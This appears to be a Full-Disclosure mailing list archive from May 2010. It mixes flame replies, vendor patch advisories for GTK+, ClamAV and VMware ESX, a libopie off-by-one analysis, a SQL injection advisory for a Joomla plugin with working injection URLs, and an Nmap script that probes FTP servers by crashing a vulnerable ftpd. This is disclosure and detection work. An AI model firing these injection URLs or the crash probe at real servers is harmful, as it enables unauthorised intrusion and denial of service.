Re: [Full-disclosure] To the police who torment, harass and stalk me.
On 27/05/2010 02:23, ☣frank^2 wrote: On Wed, May 26, 2010 at 7:15 AM, n3pt...@london.com wrote: I am a question to the world, Not an answer to be heard. All a moment that's held in your arms. And what do you think you'd ever say? I won't listen anyway… You don't know me, And I’ll never be what you want me to be. snip Pick up the pace! Enemy, show me what you wanna be. I can handle anything, even if I can't handle you. Readily, either way it better be. Don't you fucking pity me. Get up, get off. What the hell I'm saying i don't know about malevolent. Sure as hell decadent. I want someone to step up step off. Walls, let me fall, fuck you all. Get a grip, don't let me slip 'till i drop the ball. snip I'm a little teapot Short and stout Here is my handle Here is my spout ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in DS-Syndicate for Joomla
Hello Benji! It's good that you are drawing attention to my advisories, but very often your letters are unequal and not serious. So I've put you in my blacklist. I already wrote recommendation for people to the list, to use your time wisely. And because you can't do it by yourself (as it clear), I'll help you. I hope now you'll become using your time more wisely. so you've moved from discovering leet xss vulnerabilities I'm discovering any vulnerabilities which I meet during my researchers. I have no prejudice for any of classes from WASC TC v1/v2. If you have some problems with XSS or any other class of vulnerabilities, it's your own problems (as I already mentioned to the list concerning moaning about XSS). to publishing old exploits? I don't think it's old. While there are web sites with this vulnerability, it'll be not old and actual. I found these vulnerabilities in 2009 at one web site (and after my announce in 2010 I checked it on other web sites), so that time were sites with these holes, and now there are sites with them. And in my second advisory about DS-Syndicate, which I have published even before you wrote me your letter, I wrote about new vulnerabilities which I recently found in this plugin. So if you were looking for some fresh holes, you could easily found them. I would offer you a sec. job, but unfortunately I think you're too qualified. Thanks for offer :-). But I don't need offers from not serious people (including you). Also note that from my side, I'd never offer you a security job, because I need only serious employee. It's my main criterion for all kind of job, including security job. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: Benji To: MustLive Cc: full-disclosure@lists.grok.org.uk Sent: Sunday, May 23, 2010 1:55 PM Subject: Re: [Full-disclosure] Vulnerabilities in DS-Syndicate for Joomla oh cool, so you've moved from discovering leet xss vulnerabilities to publishing old exploits? I would offer you a sec. job, but unfortunately I think you're too qualified. On Sat, May 22, 2010 at 4:09 PM, MustLive mustl...@websecurity.com.ua wrote: Hello Full-Disclosure! I want to warn you about security vulnerabilities in plugin DS-Syndicate for Joomla. - Advisory: Vulnerabilities in DS-Syndicate for Joomla - URL: http://websecurity.com.ua/4003/ - Affected products: all versions of DS-Syndicate for Joomla. - Timeline: 16.08.2009 - found vulnerabilities. 04.03.2010 - announced at my site. And after making of announcement of these vulnerabilities, I found that already in 2008 this SQLi vulnerability was found by boom3rang (before I found it in 2009). Which disclosed exploit for it at milw0rm.com (http://www.milw0rm.com/exploits/6792). So boom3rang first found SQLi, and I first found Full path disclosure in this plugin. 09.03.2010 - informed developer (and at developer's site I found that he'd no more support of this plugin, after his site on Joomla was hacked). 21.05.2010 - disclosed at my site. - Details: These are SQL Injection and Full path disclosure vulnerabilities. SQL Injection: http://site/index2.php?option=ds-syndicateversion=1feed_id=-1%20or%20version()=5 Full path disclosure: http://site/index2.php?option=ds-syndicateversion=1feed_id= Note, that developer of the plugin don't support it anymore, so users of the plugin need to fix it by themselves. Just after disclosure of these vulnerabilities, I also found new vulnerabilities in DS-Syndicate which I wrote about in separate advisory. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] libopie __readrec() off-by one (FreeBSD ftpd remote PoC)
[ libopie __readrec() off-by one (FreeBSD ftpd remote PoC) ] Authors: - Maksymilian Arciemowicz - Adam 'pi3' Zabrocki http://securityreason.com/achievement_securityalert/87 http://site.pi3.com.pl/adv/libopie-adv.txt http://blog.pi3.com.pl/?p=111 Date: - Dis.: 04.05.2010 - Pub.: 27.05.2010 CVE: CVE-2010-1938 CWE: CWE-193 Affected Software: - OPIE Authentication System ( libopie ) Software which use libopie: - OpenSuSE - wu-ftpd - mod_opie - PAM - openssh (modified by FreeBSD/DragonflyBSD Team) - sudo - opiesu - popper - Probably much more... PoC: - FreeBSD 8.0 ftpd(8) Remote Off-by one line FreeBSD 7 is not affected Other software can be also affected. NOTE: Prior versions may also be affected. Orginal URL: http://securityreason.com/achievement_securityalert/84 --- 0.Description --- OPIE is a freely redistributable kit that will drop into most *IX systems and replaces your login and FTP daemon with versions that use OTP for user authentication. It also includes an OTP generator and a library to make it easy to add OTP authentication to existing clients and servers. --- 1. OPIE Authentication System Off-by one --- Libopie allows REMOTE and LOCAL attackers to off-by-one attack (on the stack). Let's look in the code: /src/contrib/opie/opie.h /* Maximum length of a principal (read: user name) */ #define OPIE_PRINCIPAL_MAX 32 ./src/contrib/opie/libopie/readrec.c int __opiereadrec FUNCTION((opie), struct opie *opie) { ... ... { char *c, principal[OPIE_PRINCIPAL_MAX]; int i; if (c = strchr(opie-opie_principal, ':')) *c = 0; [1] if (strlen(opie-opie_principal) OPIE_PRINCIPAL_MAX) [2] (opie-opie_principal)[OPIE_PRINCIPAL_MAX] = 0; [3] strcpy(principal, opie-opie_principal); ... ... } ... ... ret: if (f) fclose(f); return rval; } This function at [1] check the length of the variable 'opie-opie_principal' which is full user controled. If this length is bigger than OPIE_PRINCIPAL_MAX - 32 bytes, program will write at this position NULL byte. In fact the string will be 32 bytes long. Vulnerability exists at line [3]. Function strcpy() copy user controled variable which can be maximum 32 bytes long, to the local bufor 'principal' which is 32 bytes long too. Here is off-by-one bug because function strcpy() after copied 32 bytes alwyas ADD NULL byte to the and of string. In fact it will be at the position *(principal+32) which is out of buffer. A possible way to exploit this vulnerability: ./src/contrib/opie/libopie/lookup.c int opielookup FUNCTION((opie, principal), struct opie *opie AND char *principal) { int i; memset(opie, 0, sizeof(struct opie)); opie-opie_principal = principal; if (i = __opiereadrec(opie)) === our call ;) return i; return (opie-opie_flags __OPIE_FLAGS_RW) ? 0 : 2; } a deeper analyzis of the code shows: ./src/contrib/opie/libopie/challenge.c int opiechallenge FUNCTION((mp, name, ss), struct opie *mp AND char *name AND char *ss) { int rval = -1; rval = opielookup(mp, name); ... ... return rval; } This function is really intereting because it is responsible for authentication so this vulnerability can be in the pre-auth phase. We can found many softwares which use this function for authorization (for example default ftp daemon in FreeBSD) ;) Another interesting call we can find here: ./src/contrib/opie/libopie/writerec.c int __opiewriterec FUNCTION((opie), struct opie *opie) { char buf[17], buf2[64]; time_t now; FILE *f, *f2 = NULL; int i = 0; char *c; time(now); if (strftime(buf2, sizeof(buf2), %b %d,%Y %T, localtime(now)) 1) return -1; if (!(opie-opie_flags __OPIE_FLAGS_READ)) { struct opie opie2; i = opielookup(opie2, opie-opie_principal); == our call :) ... } ... ... } and this function is used in many places: ./src/contrib/opie/libopie/passwd.c=== in function opiepasswd() ./src/contrib/opie/libopie/verify.c=== in function opieverify() - two times ;) ... so we have got many entry points ;) But we are going to test calls to function opiechallenge(). Pre-auth vulnerability sounds impressive ;) At first let's test default FTP daemon for FreeBSD 8.0 ... --- 2. FreeBSD 8.0 ftpd remote off-by one --- Authentication module for FTP server in FreeBSD 8 module was modified. By default it uses OPIE library. Let`s see http://www.freebsd.org/cgi/cvsweb.cgi/~checkout~/src/libexec/ftpd/ftpd.c?rev=1.214.2.1.2.1;content-type=text%2Fplain ... if (opiechallenge(opiedata, name, opieprompt) == 0) { pwok = (pw != NULL) opieaccessfile(remotehost) opiealways(pw-pw_dir); reply(331, Response to %s %s for %s., opieprompt, pwok ? requested : required, name); } else { pwok = 1; reply(331, Password required for %s., name); } askpasswd = 1; ... this code has
[Full-disclosure] [ MDVSA-2010:109 ] gtk+2.0
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:109 http://www.mandriva.com/security/ ___ Package : gtk+2.0 Date: May 27, 2010 Affected: 2008.0, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability was discovered and fixed in gtk+2.0: gdk/gdkwindow.c in GTK+ before 2.18.5, as used in gnome-screensaver before 2.28.1, performs implicit paints on windows of type GDK_WINDOW_FOREIGN, which triggers an X error in certain circumstances and consequently allows physically proximate attackers to bypass screen locking and access an unattended workstation by pressing the Enter key many times (CVE-2010-0732). Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149products_id=490 This update fixes this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0732 ___ Updated Packages: Mandriva Linux 2008.0: c3a29224a7ab7f869fad3541908f6eff 2008.0/i586/gtk+2.0-2.12.1-2.2mdv2008.0.i586.rpm f3b1608da1dce0eb474b1f21bd77d75b 2008.0/i586/libgdk_pixbuf2.0_0-2.12.1-2.2mdv2008.0.i586.rpm 040a1ca71f7eadb280de43c92e49c17d 2008.0/i586/libgdk_pixbuf2.0_0-devel-2.12.1-2.2mdv2008.0.i586.rpm 57e8f954302b4c65ade25df18a6c95df 2008.0/i586/libgtk+2.0_0-2.12.1-2.2mdv2008.0.i586.rpm 49419f6f92d6b0ec484aced9de1bab2e 2008.0/i586/libgtk+2.0_0-devel-2.12.1-2.2mdv2008.0.i586.rpm 00b2ead1a22168be0125f115d8f0acb1 2008.0/i586/libgtk+-x11-2.0_0-2.12.1-2.2mdv2008.0.i586.rpm e6ad155061eed97be73cd9cc8a52a0d9 2008.0/SRPMS/gtk+2.0-2.12.1-2.2mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 311dd4f3603ff9759e1136eeecaee89b 2008.0/x86_64/gtk+2.0-2.12.1-2.2mdv2008.0.x86_64.rpm 1af93ae5f0a506d4bd96d488335b4aa4 2008.0/x86_64/lib64gdk_pixbuf2.0_0-2.12.1-2.2mdv2008.0.x86_64.rpm 90ad7d83058d56e88961cbb4a4087b74 2008.0/x86_64/lib64gdk_pixbuf2.0_0-devel-2.12.1-2.2mdv2008.0.x86_64.rpm 67e8e76883260fff690d6b04ebb89cfc 2008.0/x86_64/lib64gtk+2.0_0-2.12.1-2.2mdv2008.0.x86_64.rpm 129c65e8a1b8ba370556de12547c9f5c 2008.0/x86_64/lib64gtk+2.0_0-devel-2.12.1-2.2mdv2008.0.x86_64.rpm 57e9f7712ed1f9eda1a1729c29049f8d 2008.0/x86_64/lib64gtk+-x11-2.0_0-2.12.1-2.2mdv2008.0.x86_64.rpm e6ad155061eed97be73cd9cc8a52a0d9 2008.0/SRPMS/gtk+2.0-2.12.1-2.2mdv2008.0.src.rpm Mandriva Linux 2009.0: bcd63973ddb957847088f71b5cfc039b 2009.0/i586/gtk+2.0-2.14.3-2.1mdv2009.0.i586.rpm 9b46f9018c8fbb2d1e052e0cdd473ff4 2009.0/i586/libgail18-2.14.3-2.1mdv2009.0.i586.rpm 4d243b829780c8d2f35b4a5f08ac9acb 2009.0/i586/libgail-devel-2.14.3-2.1mdv2009.0.i586.rpm a8ca74ec343faac9f4445cfc88b5accc 2009.0/i586/libgdk_pixbuf2.0_0-2.14.3-2.1mdv2009.0.i586.rpm 583607af6457480c4cb71af16f6f4563 2009.0/i586/libgdk_pixbuf2.0_0-devel-2.14.3-2.1mdv2009.0.i586.rpm 8b9b0c013bc5815e5803b3be4e681433 2009.0/i586/libgtk+2.0_0-2.14.3-2.1mdv2009.0.i586.rpm 10f6558dc95fe770c87e99f711c089fb 2009.0/i586/libgtk+2.0_0-devel-2.14.3-2.1mdv2009.0.i586.rpm 23eb8c8cfc87a4209b125b8909fb8a9b 2009.0/i586/libgtk+-x11-2.0_0-2.14.3-2.1mdv2009.0.i586.rpm d301fc61a2c8dc41a436edb699061955 2009.0/SRPMS/gtk+2.0-2.14.3-2.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 6999641e621f9ee15bc439e0fe9b981f 2009.0/x86_64/gtk+2.0-2.14.3-2.1mdv2009.0.x86_64.rpm 33851500c872f253715d11fc1f0b908d 2009.0/x86_64/lib64gail18-2.14.3-2.1mdv2009.0.x86_64.rpm 47eaee7ac4576291e0974d7117a89459 2009.0/x86_64/lib64gail-devel-2.14.3-2.1mdv2009.0.x86_64.rpm e2b68a8d746c9bb2bd515c93220ed73d 2009.0/x86_64/lib64gdk_pixbuf2.0_0-2.14.3-2.1mdv2009.0.x86_64.rpm 62060cfea7c077bebf712ddeea8960f1 2009.0/x86_64/lib64gdk_pixbuf2.0_0-devel-2.14.3-2.1mdv2009.0.x86_64.rpm c191760f279fc7ef06bef3e37d3a5f82 2009.0/x86_64/lib64gtk+2.0_0-2.14.3-2.1mdv2009.0.x86_64.rpm 8c3cbfa56ca337b7e76ede7cdb6bf2dd 2009.0/x86_64/lib64gtk+2.0_0-devel-2.14.3-2.1mdv2009.0.x86_64.rpm 650995e6bec10b2d424b708e1be21d2f 2009.0/x86_64/lib64gtk+-x11-2.0_0-2.14.3-2.1mdv2009.0.x86_64.rpm d301fc61a2c8dc41a436edb699061955 2009.0/SRPMS/gtk+2.0-2.14.3-2.1mdv2009.0.src.rpm Mandriva Linux 2009.1: f2396f78726e185da0c3bef4d762e8d0 2009.1/i586/gtk+2.0-2.16.1-4.1mdv2009.1.i586.rpm 07d45a8c633b79b3769035bcb0612a4b 2009.1/i586/libgail18-2.16.1-4.1mdv2009.1.i586.rpm 9110a10744b8f30bbcf67cd8c03eb4c7 2009.1/i586/libgail-devel-2.16.1-4.1mdv2009.1.i586.rpm 6f6edd01aec6960ddef6da316deb0e67 2009.1/i586/libgdk_pixbuf2.0_0-2.16.1-4.1mdv2009.1.i586.rpm 1e74c1e51677679f4d1f717253bac8f8
Re: [Full-disclosure] To the police who torment, harass and stalk me.
They might be at your door. I recommend walking to your window and peeking outside every 120 seconds. -- Freelance Web/Desktop Developer http://fusecurity.com/ | Free Security Technology http://www.rentacoder.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:110 ] clamav
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:110 http://www.mandriva.com/security/ ___ Package : clamav Date: May 27, 2010 Affected: 2008.0, 2009.0, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities was discovered and fixed in clamav: The cli_pdf function in libclamav/pdf.c in ClamAV before 0.96.1 allows remote attackers to cause a denial of service (crash) via a malformed PDF file, related to an inconsistency in the calculated stream length and the real stream length (CVE-2010-1639). Off-by-one error in the parseicon function in libclamav/pe_icons.c in ClamAV 0.96 allows remote attackers to cause a denial of service (crash) via a crafted PE icon that triggers an out-of-bounds read, related to improper rounding during scaling (CVE-2010-1640). Packages for 2008.0 and 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149products_id=490 This update provides clamav 0.96.1 which is not vulnerable to these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1639 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1640 ___ Updated Packages: Mandriva Linux 2008.0: befa2aace21d5723723bb3a93444fff6 2008.0/i586/clamav-0.96.1-0.1mdv2008.0.i586.rpm 91de0b1b1d3717b02c5ec78f40b60068 2008.0/i586/clamav-db-0.96.1-0.1mdv2008.0.i586.rpm 5e63fa6565cbfaa4cc4000f77524a181 2008.0/i586/clamav-milter-0.96.1-0.1mdv2008.0.i586.rpm 58e46d78bf423fbb1ef84d6073fe1040 2008.0/i586/clamd-0.96.1-0.1mdv2008.0.i586.rpm f24eadf9d0a1b0a7c733568207743385 2008.0/i586/libclamav6-0.96.1-0.1mdv2008.0.i586.rpm 3fee97d038854d35d18aee05054b6c0d 2008.0/i586/libclamav-devel-0.96.1-0.1mdv2008.0.i586.rpm ffbe6ca177a8b262e4c6fc0ca0f3669c 2008.0/SRPMS/clamav-0.96.1-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 1082117001d058707bdfacc642498a2a 2008.0/x86_64/clamav-0.96.1-0.1mdv2008.0.x86_64.rpm 21bd752b8b431e61c089ccf428d01d29 2008.0/x86_64/clamav-db-0.96.1-0.1mdv2008.0.x86_64.rpm 2f83a0bb14fcefb8717f80964b173894 2008.0/x86_64/clamav-milter-0.96.1-0.1mdv2008.0.x86_64.rpm a873d1c7e52e1c3d66b0515f83cb 2008.0/x86_64/clamd-0.96.1-0.1mdv2008.0.x86_64.rpm 7646d23e108a6e14f8d4092415ac02b9 2008.0/x86_64/lib64clamav6-0.96.1-0.1mdv2008.0.x86_64.rpm 658acc18cafe0edfa371ecbc014df8ae 2008.0/x86_64/lib64clamav-devel-0.96.1-0.1mdv2008.0.x86_64.rpm ffbe6ca177a8b262e4c6fc0ca0f3669c 2008.0/SRPMS/clamav-0.96.1-0.1mdv2008.0.src.rpm Mandriva Linux 2009.0: a8d05f37aa91c68aae2085ff732c702b 2009.0/i586/clamav-0.96.1-0.1mdv2009.0.i586.rpm 5ec9f018d0041edb436550c89309171d 2009.0/i586/clamav-db-0.96.1-0.1mdv2009.0.i586.rpm 99628e6c2a48857b8826602c697b16ab 2009.0/i586/clamav-milter-0.96.1-0.1mdv2009.0.i586.rpm 0224610ee1b6329eff5c22d7f39578f0 2009.0/i586/clamd-0.96.1-0.1mdv2009.0.i586.rpm fca0b7af4f6bb22071c75baab07a35b1 2009.0/i586/libclamav6-0.96.1-0.1mdv2009.0.i586.rpm bdabf8cdc50a4c5685e6d260afe415b3 2009.0/i586/libclamav-devel-0.96.1-0.1mdv2009.0.i586.rpm d11af730b3a2c053ba1d6ec23fc564f0 2009.0/SRPMS/clamav-0.96.1-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 60f63c024a8f817dadffa0d89e21eb9f 2009.0/x86_64/clamav-0.96.1-0.1mdv2009.0.x86_64.rpm 18f79b9b586bc80732dd10dbd2a6cc79 2009.0/x86_64/clamav-db-0.96.1-0.1mdv2009.0.x86_64.rpm a581fe3f1c8361fabaf3cb9f376d59cb 2009.0/x86_64/clamav-milter-0.96.1-0.1mdv2009.0.x86_64.rpm 86a0d9f2a488e4da2fe6b53527b815e7 2009.0/x86_64/clamd-0.96.1-0.1mdv2009.0.x86_64.rpm 7e9bad2cfe4809f985d9d908af327b8d 2009.0/x86_64/lib64clamav6-0.96.1-0.1mdv2009.0.x86_64.rpm d805cfe2b75d9a0fa2ffa0d31d7d27ec 2009.0/x86_64/lib64clamav-devel-0.96.1-0.1mdv2009.0.x86_64.rpm d11af730b3a2c053ba1d6ec23fc564f0 2009.0/SRPMS/clamav-0.96.1-0.1mdv2009.0.src.rpm Corporate 4.0: 1f908bfa4cbe1232569026efcf034b12 corporate/4.0/i586/clamav-0.96.1-0.1.20060mlcs4.i586.rpm 647ff93c4169583e606987983de6f938 corporate/4.0/i586/clamav-db-0.96.1-0.1.20060mlcs4.i586.rpm a1bd815b64388a6a04fd14f423970c70 corporate/4.0/i586/clamav-milter-0.96.1-0.1.20060mlcs4.i586.rpm fe0f9d33df3d9127161a8551dbb7e6c7 corporate/4.0/i586/clamd-0.96.1-0.1.20060mlcs4.i586.rpm 2faa8d0b9553999d5b18314ce63bf06b corporate/4.0/i586/libclamav6-0.96.1-0.1.20060mlcs4.i586.rpm e4728f4fa514d353279521d8ae782c0a corporate/4.0/i586/libclamav-devel-0.96.1-0.1.20060mlcs4.i586.rpm 517ac78ca08fe3ccd80ccd0e160c4f02 corporate/4.0/SRPMS/clamav-0.96.1-0.1.20060mlcs4.src.rpm Corporate
[Full-disclosure] ftp-libopie.nse in response to CVE-2010-1938
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 A vulnerability that has been published today affects the OPIE Authentication System (libopie). According to the researchers it could hit many systems like - - OpenSuSE - - wu-ftpd - - mod_opie - - PAM - - openssh (modified by FreeBSD/DragonflyBSD Team) - - sudo - - opiesu - - popper - - Probably much more... Original advisory : http://securityreason.com/achievement_securityalert/87 See also : http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc Please find attached their PoC as a script for Nmap. Example Output : - -- PORT STATE SERVICE - -- 21/tcp open ftp - -- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow) - -- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc A.G. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.12 (GNU/Linux) Comment: Using GnuPG with SUSE - http://enigmail.mozdev.org/ iEYEARECAAYFAkv+rS8ACgkQ3aDTTO0ha7j4igCffydmk9Y+U6ocVSNI5RwopoGh vc0AniRSZZEkW5vgImS4czZsTTzS1bqf =No6K -END PGP SIGNATURE- description = [[ Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow). Vulnerability discovered by Maksymilian Arciemowicz and Adam 'pi3' Zabrocki ]] --- -- @output -- PORT STATE SERVICE -- 21/tcp open ftp -- | ftp-libopie: Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow) -- |_See http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc author = Ange Gutek license = Same as Nmap--See http://nmap.org/book/man-legal.html; categories = {intrusive} require shortport portrule = shortport.port_or_service(21, ftp) action = function(host, port) local socket = nmap.new_socket() local result -- If we use more that 31 chars for username, ftpd will crash (quoted from the advisory). local user_account = AAA local status = true local err_catch = function() socket:close() end local try = nmap.new_try(err_catch) socket:set_timeout(1) try(socket:connect(host.ip, port.number, port.protocol)) -- First, try a safe User so that we are sure that everything is ok local payload = USER opie\r\n try(socket:send(payload)) status, result = socket:receive_lines(1); if status and not (string.match(result,^421)) then -- Second, try the vulnerable user account local payload = USER .. user_account .. \r\n try(socket:send(payload)) status, result = socket:receive_lines(1); if status then return else -- if the server does not answer anymore we may have reached a stack overflow condition return Likely prone to CVE-2010-1938 (OPIE off-by-one stack overflow)\nSee http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc; end else return end socket:close() end ___ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-945-1] ClamAV vulnerabilities
=== Ubuntu Security Notice USN-945-1 May 27, 2010 clamav vulnerabilities CVE-2010-1639, CVE-2010-2077 === A security issue affects the following Ubuntu releases: Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.04: libclamav6 0.95.3+dfsg-1ubuntu0.09.04.2 Ubuntu 9.10: libclamav6 0.95.3+dfsg-1ubuntu0.09.10.2 Ubuntu 10.04 LTS: libclamav6 0.96.1+dfsg-0ubuntu0.10.04.1 In general, a standard system update will make all the necessary changes. For Ubuntu 10.04 LTS, this update uses a new upstream release, which includes additional bug fixes. Details follow: It was discovered that ClamAV did not properly reallocate memory when processing certain PDF files. A remote attacker could send a specially crafted PDF and crash ClamAV. (CVE-2010-1639) An out of bounds memory access flaw was discovered in ClamAV. A remote attacker could send a specially crafted Portable Executable (PE) file and crash ClamAV. This issue only affected Ubuntu 10.04 LTS. (CVE-2010-2077) Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2.diff.gz Size/MD5: 265661 7787b2b42609df529788c879e36d9fe8 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2.dsc Size/MD5: 1560 377a7d9c49cb15e1713f54b0a25778a2 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg.orig.tar.gz Size/MD5: 26892533 dfe1348c52223ab48f049123021aea4a Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-base_0.95.3+dfsg-1ubuntu0.09.04.2_all.deb Size/MD5: 24053336 60f643f76df7bf4db43f644bfc3ed5b4 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-docs_0.95.3+dfsg-1ubuntu0.09.04.2_all.deb Size/MD5: 1123516 f71ab8f9fba78f294ced9c926d0e7b04 http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-testfiles_0.95.3+dfsg-1ubuntu0.09.04.2_all.deb Size/MD5: 232182 9800f0104337931ae21666820cde amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb Size/MD5: 382010 a9505fb7d8d8f5f0356ca6e78cc7e04a http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb Size/MD5: 1167968 1fa1d2e81f9087949fc3b9a03aa8d6ee http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb Size/MD5: 287956 9ffd2f325bc3502f78b35a9b8f193e3a http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb Size/MD5: 280340 caf37e1970961ec2da36f58172d88049 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb Size/MD5: 614446 4ddcb4980913c6e46d5a9eb0b5bcc290 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb Size/MD5: 579218 e7431e82192047d8c826a5b5181f58c4 http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.95.3+dfsg-1ubuntu0.09.04.2_amd64.deb Size/MD5: 308570 69d6fba8d6eb6b0565df12334c5b1e4d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-daemon_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb Size/MD5: 369822 0bc1791b8fe80b663624303440caee1e http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-dbg_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb Size/MD5: 1082008 dddcf1b0edea5259597406d989699290 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav-freshclam_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb Size/MD5: 285352 a40c187d2495a44fcebf2d6d777d4967 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/clamav_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb Size/MD5: 275122 c11a165ab966c63b8d3fe643b65ad607 http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav-dev_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb Size/MD5: 582384 586b5b1ad20b2b6373addfe17785b5ba http://security.ubuntu.com/ubuntu/pool/main/c/clamav/libclamav6_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb Size/MD5: 566848 455db6e033a4ecf8f98febcee221aa55 http://security.ubuntu.com/ubuntu/pool/universe/c/clamav/clamav-milter_0.95.3+dfsg-1ubuntu0.09.04.2_i386.deb Size/MD5: 304884 1cffeedb1dd62e82bef4939c9d6d84ab lpia architecture (Low Power Intel Architecture):
[Full-disclosure] VMSA-2010-0009 ESXi ntp and ESX Service Console third party updates
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - VMware Security Advisory Advisory ID: VMSA-2010-0009 Synopsis: ESXi ntp and ESX Service Console third party updates Issue date:2010-05-27 Updated on:2010-05-27 (initial release of advisory) CVE numbers: CVE-2009-2695 CVE-2009-2908 CVE-2009-3228 CVE-2009-3286 CVE-2009-3547 CVE-2009-3613 CVE-2009-3612 CVE-2009-3620 CVE-2009-3621 CVE-2009-3726 CVE-2007-4567 CVE-2009-4536 CVE-2009-4537 CVE-2009-4538 CVE-2006-6304 CVE-2009-2910 CVE-2009-3080 CVE-2009-3556 CVE-2009-3889 CVE-2009-3939 CVE-2009-4020 CVE-2009-4021 CVE-2009-4138 CVE-2009-4141 CVE-2009-4272 CVE-2009-3563 CVE-2009-4355 CVE-2009-2409 CVE-2009-0590 CVE-2009-1377 CVE-2009-1378 CVE-2009-1379 CVE-2009-1386 CVE-2009-1387 CVE-2009-4212 CVE-2009-1384 CVE-2010-0097 CVE-2010-0290 CVE-2009-3736 CVE-2010-0001 CVE-2010-0426 CVE-2010-0427 CVE-2010-0382 - 1. Summary ESXi update for ntp and ESX Console OS (COS) updates for COS kernel, openssl, krb5, gcc, bind, gzip, sudo. 2. Relevant releases VMware ESX 4.0.0 without patches ESX400-201005401-SG, ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG, ESX400-201005405-SG, ESX400-201005409-SG 3. Problem Description a. Service Console update for COS kernel Updated COS package kernel addresses the security issues that are fixed through versions 2.6.18-164.11.1. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228, CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues fixed in kernel 2.6.18-164.6.1 The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621, CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2007-4567, 